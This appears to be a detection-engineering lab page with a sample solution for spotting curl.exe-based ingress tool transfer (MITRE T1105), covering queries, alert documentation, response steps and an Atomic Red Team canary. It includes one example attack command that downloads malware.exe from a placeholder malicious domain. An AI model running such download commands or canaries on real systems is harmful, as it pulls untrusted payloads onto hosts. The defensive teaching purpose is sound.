Skip to content

Lab 5.1 (Bonus): Detection Engineering Capstone

Est. Time: 60 minutes

Goals:

  • Create a detection from the ground up, in any language of your choice, for the MITRE technique, T1105

Instructions

  1. This lab serves as a sort of “capstone” on the detection engineering front. Your objective is to, based on the MITRE TTP below, create the following for your new detection:
    1. Query
    2. Documentation (with analysis of backtest results)
    3. Canary code to trigger the detection
  2. The technique you will be making your detection for is:
    1. Ingress Tool Transfer
  3. This can be done a number of ways. T1105 covers a number of tools, techniques, and procedures- so scoping your detection to just a few is acceptable, as is focusing in on broad techniques. Below are the queries I used, focusing primarily where Curl is concerned. I also included an example ADS document, and some canary code to trigger the detect.

  4. Solution

    These solutions serve as examples only!

    Alert Documentation:

    • ADS Document (leaning on the custom GPT we used)

      Ingress Tool Transfer: Curl

      Goal

      Detect instances where adversaries use curl.exe to transfer files from remote sources, which is commonly associated with MITRE ATT&CK Technique T1105 (Ingress Tool Transfer). Attackers often use curl.exe to download payloads, additional malware, or tools for further exploitation.

      Categorization

      • MITRE ATT&CK Parent Technique: TA0011 - Command and Control
      • MITRE ATT&CK Sub-Technique: T1105 - Ingress Tool Transfer

      Strategy Abstract

      This detection monitors instances where the Windows curl utility (curl.exe) is executed in association with a file creation event. Attackers use curl.exe to download files from external URLs, which could indicate an attempt to transfer malicious payloads.

      Technical Context

      ES|QL:

      FROM logs-*
| WHERE process.name == "curl.exe" and event.code == "11"
| KEEP process.name,process.command_line,file.name,event.action

      EQL:

      sequence with maxspan=10s
    [ process where process.name: "curl.exe"]
    [ network where true ]
    [ file where true ]

      KQL:

      process.name: "curl.exe" and event.code: 11

      Expected Log Sources

      • Windows Sysmon

      Example of Suspicious curl.exe Usage

      curl.exe -o C:\\Users\\Public\\malware.exe <http://malicious-domain.com/malware.exe>

      Blind Spots and Assumptions

      • This detection assumes command-line logging is enabled (e.g., Sysmon, PowerShell logging).
      • Attackers may use obfuscation techniques, such as:
        • Renaming curl.exe
        • Using alternate file transfer tools (certutil, bitsadmin, PowerShell Invoke-WebRequest).

      False Positives

      • Legitimate file downloads: Developers or IT administrators may use curl.exe to fetch files.
      • Automated scripts: Some software installations or update processes use curl.exe.
      • Security tool updates: Endpoint security tools may fetch definitions via curl.exe.

      Reducing False Positives

      To reduce false positives, consider:

      • Filtering trusted domains: Exclude internal or trusted file transfer sources.
      • Monitoring process parent-child relationships: If curl.exe is launched by a suspicious parent (e.g., cmd.exe from a suspicious path), it might indicate malicious activity.
      • Filtering based on command-line arguments: Focus on file downloads from external, non-corporate domains.

      Validation

      Canary Code

      An Atomic Red Team canary already exists for this activity:

      Invoke-AtomicTest T1105-18

      Priority

      Medium

      • curl.exe is not frequently used by normal users, and its presence in logs with external URLs should be investigated.

      Response

      Incident Response Actions

      1. Confirm the command-line parameters
        • Extract the URL or file being downloaded.
        • Identify the parent process (e.g., cmd.exe, powershell.exe).
        • Check the execution context (user account, remote IP, etc.).
      2. Isolate the affected host
        • If the URL is malicious, isolate the host to prevent further execution.
      3. Retrieve the downloaded file
        • If possible, retrieve and analyze the file with static and dynamic analysis.
      4. Check for additional artifacts
        • Review logs for related activities (e.g., execution of the downloaded file).
        • Investigate for persistence mechanisms or lateral movement.
      5. Block the malicious domain
        • Add the domain to the firewall, proxy, or DNS blocklist.

      Additional Resources

    Basic ES|QL looking for file creates from curl.exe

    FROM logs-*
| WHERE process.name == "curl.exe" and event.code == "11"
| KEEP process.name,process.command_line,file.name,event.action

    KQL, looking for file creation events by curl.exe:

    process.name: "curl.exe" and event.code: 11

    EQL, looking for curl.exe, followed by a network connection and a file creation

    sequence with maxspan=10s
    [ process where process.name: "curl.exe"]
    [ network where true ]
    [ file where true ]

    In terms of canaries, an Atomic already exists that would apply to this circumstance! No need to re-invent the wheel:

    Atomic

    Invoke-AtomicTest T1105-18